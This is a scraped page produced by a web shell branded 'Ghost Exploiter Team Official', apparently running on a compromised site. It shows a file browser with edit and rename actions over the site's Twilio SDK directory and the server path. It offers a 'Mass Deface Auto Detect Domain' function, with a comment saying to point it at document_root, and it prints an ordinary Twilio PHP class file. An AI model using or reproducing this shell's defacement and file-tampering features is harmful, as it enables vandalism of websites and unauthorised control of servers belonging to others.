webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Rest
/
Chat
/
V2
/
Service
/
Channel
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
InviteContext.php
2.224KB
edt
ren
InviteInstance.php
4.249KB
edt
ren
InviteList.php
6.293KB
edt
ren
InviteOptions.php
2.722KB
edt
ren
InvitePage.php
1.255KB
edt
ren
MemberContext.php
3.655KB
edt
ren
MemberInstance.php
4.986KB
edt
ren
MemberList.php
6.814KB
edt
ren
MemberOptions.php
18.556KB
edt
ren
MemberPage.php
1.255KB
edt
ren
MessageContext.php
3.619KB
edt
ren
MessageInstance.php
5.256KB
edt
ren
MessageList.php
6.618KB
edt
ren
MessageOptions.php
16.038KB
edt
ren
MessagePage.php
1.261KB
edt
ren
WebhookContext.php
3.515KB
edt
ren
WebhookInstance.php
4.595KB
edt
ren
WebhookList.php
6.38KB
edt
ren
WebhookOptions.php
13.633KB
edt
ren
WebhookPage.php
1.261KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\Rest\Chat\V2\Service\Channel; use Twilio\Deserialize; use Twilio\Exceptions\TwilioException; use Twilio\InstanceResource; use Twilio\Options; use Twilio\Values; use Twilio\Version; /** * @property string $sid * @property string $accountSid * @property string $channelSid * @property string $serviceSid * @property string $identity * @property \DateTime $dateCreated * @property \DateTime $dateUpdated * @property string $roleSid * @property int $lastConsumedMessageIndex * @property \DateTime $lastConsumptionTimestamp * @property string $url * @property string $attributes */ class MemberInstance extends InstanceResource { /** * Initialize the MemberInstance * * @param Version $version Version that contains the resource * @param mixed[] $payload The response payload * @param string $serviceSid The SID of the Service that the resource is * associated with * @param string $channelSid The SID of the Channel for the member * @param string $sid The SID of the Member resource to fetch */ public function __construct(Version $version, array $payload, string $serviceSid, string $channelSid, string $sid = null) { parent::__construct($version); // Marshaled Properties $this->properties = [ 'sid' => Values::array_get($payload, 'sid'), 'accountSid' => Values::array_get($payload, 'account_sid'), 'channelSid' => Values::array_get($payload, 'channel_sid'), 'serviceSid' => Values::array_get($payload, 'service_sid'), 'identity' => Values::array_get($payload, 'identity'), 'dateCreated' => Deserialize::dateTime(Values::array_get($payload, 'date_created')), 'dateUpdated' => Deserialize::dateTime(Values::array_get($payload, 'date_updated')), 'roleSid' => Values::array_get($payload, 'role_sid'), 'lastConsumedMessageIndex' => Values::array_get($payload, 'last_consumed_message_index'), 'lastConsumptionTimestamp' => Deserialize::dateTime(Values::array_get($payload, 'last_consumption_timestamp')), 'url' => Values::array_get($payload, 'url'), 'attributes' => Values::array_get($payload, 'attributes'), ]; $this->solution = [ 'serviceSid' => $serviceSid, 'channelSid' => $channelSid, 'sid' => $sid ?: $this->properties['sid'], ]; } /** * Generate an instance context for the instance, the context is capable of * performing various actions. All instance actions are proxied to the context * * @return MemberContext Context for this MemberInstance */ protected function proxy(): MemberContext { if (!$this->context) { $this->context = new MemberContext( $this->version, $this->solution['serviceSid'], $this->solution['channelSid'], $this->solution['sid'] ); } return $this->context; } /** * Fetch the MemberInstance * * @return MemberInstance Fetched MemberInstance * @throws TwilioException When an HTTP error occurs. */ public function fetch(): MemberInstance { return $this->proxy()->fetch(); } /** * Delete the MemberInstance * * @param array|Options $options Optional Arguments * @return bool True if delete succeeds, false otherwise * @throws TwilioException When an HTTP error occurs. */ public function delete(array $options = []): bool { return $this->proxy()->delete($options); } /** * Update the MemberInstance * * @param array|Options $options Optional Arguments * @return MemberInstance Updated MemberInstance * @throws TwilioException When an HTTP error occurs. */ public function update(array $options = []): MemberInstance { return $this->proxy()->update($options); } /** * Magic getter to access properties * * @param string $name Property to access * @return mixed The requested property * @throws TwilioException For unknown properties */ public function __get(string $name) { if (\array_key_exists($name, $this->properties)) { return $this->properties[$name]; } if (\property_exists($this, '_' . $name)) { $method = 'get' . \ucfirst($name); return $this->$method(); } throw new TwilioException('Unknown property: ' . $name); } /** * Provide a friendly representation * * @return string Machine friendly representation */ public function __toString(): string { $context = []; foreach ($this->solution as $key => $value) { $context[] = "$key=$value"; } return '[Twilio.Chat.V2.MemberInstance ' . \implode(' ', $context) . ']'; } }
<=Back
Liking